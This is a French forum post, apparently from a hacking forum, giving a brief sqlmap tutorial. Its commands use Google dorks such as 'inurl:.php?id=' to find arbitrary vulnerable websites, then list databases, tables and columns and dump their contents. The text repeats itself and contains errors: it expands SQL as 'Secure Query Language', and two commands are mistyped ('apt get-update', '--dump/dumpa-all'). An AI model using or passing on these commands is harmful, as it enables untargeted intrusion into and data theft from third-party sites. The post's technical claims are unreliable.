OP 19 October, 2023 - 01:14 AM
Le tuto sera court et simple :
- quelque commandes et parametre
- fonctionnement
Avant tout SQLmap est un outil (module) console
pour console linux.
SQLi ?
Une SQLi (Secure Query Language injection) est une attaque sql.
Le sql est le language utiliser pour colluniquer entre les tables et les base de donné en general.
SQLMAP :
- Installer : sudo apt upgrade && sudo apt get-update && sudo apt install sqlmap
- Utilisation sur dork : sudo sqlmap -g "DORK" --dbs --batch --threads 10
=> -g = option google dorking (ex : "inurl:.php?cat=")
=> --dbs = parametre qui recupere le nom des database
=> --batch = parametre de prechoix des reponse (ex : Enable Charset: Utf-8 > Y)
=> threads = nombre de core assigné a la tache de requetes (10)
- Suite : sqlmap -g "inurl:.php?id=" --dbs --batch --threads 10 -D "EXEMPLE" --tables
=> -D = entrer dans une database si il ya une SQLi ex : ... -D [*]information_schema (choisir autre que info schema)
=> --tables = parametre d affichage de la database dans la console
- Suite : sqlmap -g "inurl:.php?id=" --dbs --batch --threads 10 -D "EXEMPLE" -T "EXMPLE" --columns or ... -T "EXEMPLE" --dump/dumpa-all
Desole si ce n est pas comprehensible je n ai pas le temp et j ecrit vite, je referait un poste mieux expliqué en attendant,
like ce post avant que je te mette un coup de STIC ORBITAL CANON xD
- quelque commandes et parametre
- fonctionnement
Avant tout SQLmap est un outil (module) console
pour console linux.
SQLi ?
Une SQLi (Secure Query Language injection) est une attaque sql.
Le sql est le language utiliser pour colluniquer entre les tables et les base de donné en general.
SQLMAP :
- Installer : sudo apt upgrade && sudo apt get-update && sudo apt install sqlmap
- Utilisation sur dork : sudo sqlmap -g "DORK" --dbs --batch --threads 10
=> -g = option google dorking (ex : "inurl:.php?cat=")
=> --dbs = parametre qui recupere le nom des database
=> --batch = parametre de prechoix des reponse (ex : Enable Charset: Utf-8 > Y)
=> threads = nombre de core assigné a la tache de requetes (10)
- Suite : sqlmap -g "inurl:.php?id=" --dbs --batch --threads 10 -D "EXEMPLE" --tables
=> -D = entrer dans une database si il ya une SQLi ex : ... -D [*]information_schema (choisir autre que info schema)
=> --tables = parametre d affichage de la database dans la console
- Suite : sqlmap -g "inurl:.php?id=" --dbs --batch --threads 10 -D "EXEMPLE" -T "EXMPLE" --columns or ... -T "EXEMPLE" --dump/dumpa-all
Desole si ce n est pas comprehensible je n ai pas le temp et j ecrit vite, je referait un poste mieux expliqué en attendant,
like ce post avant que je te mette un coup de STIC ORBITAL CANON xD